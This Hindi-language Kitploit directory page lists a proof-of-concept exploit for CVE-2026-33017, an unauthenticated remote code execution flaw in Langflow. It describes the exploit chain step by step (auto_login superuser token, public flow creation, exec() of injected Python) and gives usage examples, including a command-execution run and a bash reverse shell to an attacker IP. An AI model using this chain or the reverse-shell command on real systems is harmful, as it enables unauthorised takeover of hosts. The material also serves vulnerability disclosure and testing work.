Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — Langflow 1.8.1 और उससे पहले के संस्करणों में मौजूद यह भेद्यता एक दूरस्थ, अनधिकृत हमलावर को होस्ट पर मनमाना कमांड निष्पादन प्राप्त करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

Langflow 1.8.1 और उससे पहले के संस्करणों में मौजूद यह भेद्यता एक दूरस्थ, अनधिकृत हमलावर को होस्ट पर मनमाना कमांड निष्पादन प्राप्त करने की अनुमति देती है।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33017-Langflow-RCE-PoC

Langflow 1.8.1 और उससे पहले के संस्करणों में यह भेद्यता एक दूरस्थ, बिना प्रमाणीकरण वाले हमलावर को होस्ट पर मनमाना कमांड निष्पादन प्राप्त करने की अनुमति देती है।

विवरण

POST /api/v1/build_public_tmp/{flow_id}/flow एंडपॉइंट किसी को भी बिना प्रमाणीकरण के सार्वजनिक फ्लो बनाने की अनुमति देता है।

वैकल्पिक डेटा पैरामीटर प्रदान करके, एक हमलावर संग्रहीत फ्लो को अपनी स्वयं की निर्मित परिभाषा से ओवरराइड कर सकता है, नोड कॉन्फ़िगरेशन के भीतर मनमाना Python कोड एम्बेड कर सकता है। यह उपयोगकर्ता-नियंत्रित कोड बिना किसी सैंडबॉक्सिंग या सत्यापन के exec() के माध्यम से निष्पादित किया जाता है, जिससे बिना प्रमाणीकरण के रिमोट कोड निष्पादन होता है।

प्रभावित संस्करण

root@kitploit:~
Langflow 1.8.1 और उससे पहले के संस्करण

विशेषताएँ

  • यदि AUTO_LOGIN=true है तो एक सार्वजनिक फ्लो बनाना
  • एक्सप्लॉइट निष्पादन: मनमाना कमांड निष्पादित करें।
  • रिवर्स शेल: bash-आधारित रिवर्स शेल प्रारंभ करें।

पूर्वापेक्षाएँ

  • लक्षित Langflow इंस्टेंस में कम से कम एक सार्वजनिक फ्लो हो (डेमो, चैटबॉट या साझा वर्कफ़्लो में सामान्य)
  • एक सार्वजनिक फ्लो का UUID (साझा लिंक/URL से प्राप्त किया जा सकता है)
  • किसी प्रमाणीकरण की आवश्यकता नहीं है

जब AUTO_LOGIN=true (डिफ़ॉल्ट कॉन्फ़िगरेशन) होता है, तो एक बिना प्रमाणीकरण वाला हमलावर सभी शर्तों को पूरा कर सकता है:

  • GET /api/v1/auto_login → एक सुपरयूज़र टोकन प्राप्त करें
  • POST /api/v1/flows/ → एक सार्वजनिक फ्लो बनाएं
  • बिना किसी प्रमाणीकरण के build_public_tmp के माध्यम से एक्सप्लॉइट ट्रिगर करें

उपयोग

root@kitploit:~
python cve-2026-33017.py <host> [options]

विकल्प:

root@kitploit:~
-p PORT, --port PORT: SSH पोर्ट (डिफ़ॉल्ट: 7860)

-id FLOW_ID, --flow_id FLOW_ID: सार्वजनिक फ्लो ID (छोड़े जाने पर एक नया बनाया जाएगा)

-c COMMAND, --command COMMAND: निष्पादित करने के लिए कस्टम कमांड

--shell: एक रिवर्स शेल प्रारंभ करें

--lhost LHOST: रिवर्स शेल के लिए हमलावर का IP

--lport LPORT: रिवर्स शेल के लिए हमलावर का पोर्ट (डिफ़ॉल्ट: 4444)

-t TIMEOUT, --timeout TIMEOUT: कनेक्शन टाइमआउट सेकंड में (डिफ़ॉल्ट: 5)

उदाहरण:

एक कमांड निष्पादित करें:

root@kitploit:~
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'

एक रिवर्स शेल प्रारंभ करें:

root@kitploit:~
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

संदर्भ

GitHub सलाह

NVD CVE-2026-33017

Medium

⚠️ अस्वीकरण

यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसे अपने जोखिम पर उपयोग करें। लेखक किसी भी दुरुपयोग या हुई क्षति के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें